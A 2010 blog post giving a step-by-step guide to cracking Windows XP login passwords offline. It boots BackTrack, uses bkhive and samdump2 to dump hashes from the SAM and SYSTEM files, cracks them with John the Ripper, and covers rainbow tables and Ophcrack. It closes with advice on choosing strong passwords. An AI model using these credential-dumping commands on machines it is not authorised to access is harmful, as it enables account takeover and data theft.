Saturday, January 2, 2010

How to hack passwords in windows XP?

Warning!
Things here explained can be used in extremely nasty things. They are not recommended by Opentechlab. Use everything in your own risk. Also Opentechlab suggest some tips to avoid password hacking.

Here I am going to say something cumbersome to somebody. Here is a guide to hack the login passwords in windows XP. Also given how to avoid such hacking and keep your PC maximum protected from crackers. Opentechlab does not crack, it will hack only!

Password hacking using Backtrack
You first download the following file

Backtrack 3 Final (BT4 is also available, but I suggest BT3)

BT3 is an opensource Linux OS. BT3 consists of just a slax and the hacking and network security software. Since Slax uses lzm module mechanism, it is easy to install and remove the modules we need to. You ca download it as a bootable iso image or as USB pen drive installation file. I downloaded iso and write it to a CD and everything going perfect. Once you installed BT3, you just need to boot up from CD-ROM. Within minutes, linux kernel loads and backtrack desktop appears. Now you need to do the following things:

bkhive /mnt/hda1/WINDOWS/system32/config/SYSTEM key

(result is the boot key)

samdump2 /mnt/hda1/WINDOWS/system32/config/SAM key
samdump2 /mnt/hda1/WINDOWS/system32/config/SAM key >~/Desktop/password.txt
john ~/Desktop/password.txt -users=Administrator

now the hashed password will be showing below

Here, it is assumed that hda1 is C: drive (where MS windows XP is intalled). If not, that should be repaced with the actual one. The password.txt is file which contain passwords of all users, but they are no readable, they are hashed. To remove hash, you need to call a program called john.
john ~/Desktop/password.txt -users=Administrator
only gives the password of Administrator. If you want to know the password of another user, type:
john ~/Desktop/password.txt -users=username
You can simply do this:
john ~/Desktop/password.txt
to get passwords of all users, but it is time consuming. Knowing what you want is ponentially advantageus than knowing everything. And it will not eat much of your time. Somethimes if the password to be hacked is much complex, you get a leisure time to drink a cup of coffee!

How to use rainbow tables in backtrack?
You can use rainbow tables while hacking passwords. You can download lot of rainbow tables from freerainbowtables. I think downloading all rainbow tables in your hard disk is frustrainting (more than 1000GB!). Download some simple tables to experiment with. To use rainbow tables, BT3 provides a program called 'rainbowcrack'. It can be accessed from:
Main menu -> Backtrack -> privilege escalation ->All -> Rainbow crack
But rainbow crack only supports tables of type *.rt. But rainbow tables with type *.rti is abundant over internet to free download. Solution is to download *.rti tables and conver it to *.rt using rti2rto.exe. Here you are able to use rainbow crack instead of john. All other steps are same.

Using Ophcrack
Ophcrack is also opensource and is also useful. I personally didn't tried that, however many of my friends work successfully with that.

Download Ophcrack
You need to download rainbow tables also.
Read more about rainbow tables

How to prevent password hacking?
Here again, prevention is better than cure. If you care about how much your data secure to be, you should keep your passwords be secure first. First of all, you do not store your passwords anywhere other than your brain. Every time you enter your passwords at login, is boring, but you should aware of the consequences. I said it generally, but here this is not possible. Use more than 10 characters for your password. For each addition of a new character, you can see that how much extra time BT3 takes to find out the password. Add symbolic characters and numbers. Finding a password with symbolic characters and numbers are very frustrating, and a cracker work hard for hours on such computer until he get a message 'Failed to find password'. Don't enter a password with meaningful words. If your password is a sentence such as 'Mary had a little lamb' and others password is 'asdfiuerh', then it is very easy to find out the former even though it is lengthy in character. Use different passwords for diffenrnt internet accounts. If you feel difficulty to memorise all passwords, you requre a good password manager (I recommend Keepass). Change your passwords periodically. It will save you a lot. If you have a top secret information, and is not to be revealed to the world for any reason, I have a good idea but is not guaranteed. Just copy the thing to any portable device and put it in a Bank locker and through your computer to fire and keep watching until it get into ashes.

1 comment:

Anonymous said...

Principled making my first post at opentechlab.blogspot.com, which seems to be a wonderful forum!